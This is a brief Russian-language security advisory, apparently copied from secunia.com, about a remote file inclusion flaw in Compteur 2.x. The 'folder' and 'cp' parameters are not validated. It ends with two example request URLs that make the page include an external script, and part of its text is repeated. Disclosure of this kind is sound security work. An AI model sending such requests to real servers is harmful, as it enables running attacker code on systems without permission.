Compteur - php including
Дата Выпуска: 2006-10-11
Уровень: Высоко критический
Решение: Неисправленно
Программное обеспечение: Compteur 2.x
Описание:
Входящие данные в параметрах "folder" в param_editor.php, и "cp" в compteur.phpдолжным образом не проверяются при инклуде локальных файлов.
Уязвимость позволяет заинклудить внешний скрипт.
Пример:
Источник: secunia.com
Дата Выпуска: 2006-10-11
Уровень: Высоко критический
Решение: Неисправленно
Программное обеспечение: Compteur 2.x
Описание:
Входящие данные в параметрах "folder" в param_editor.php, и "cp" в compteur.phpдолжным образом не проверяются при инклуде локальных файлов.
Уязвимость позволяет заинклудить внешний скрипт.
Пример:
Код:
Http://www.site.com/param_editor.php?folder=URL
Http://www.site.com/counter.php?cp=URL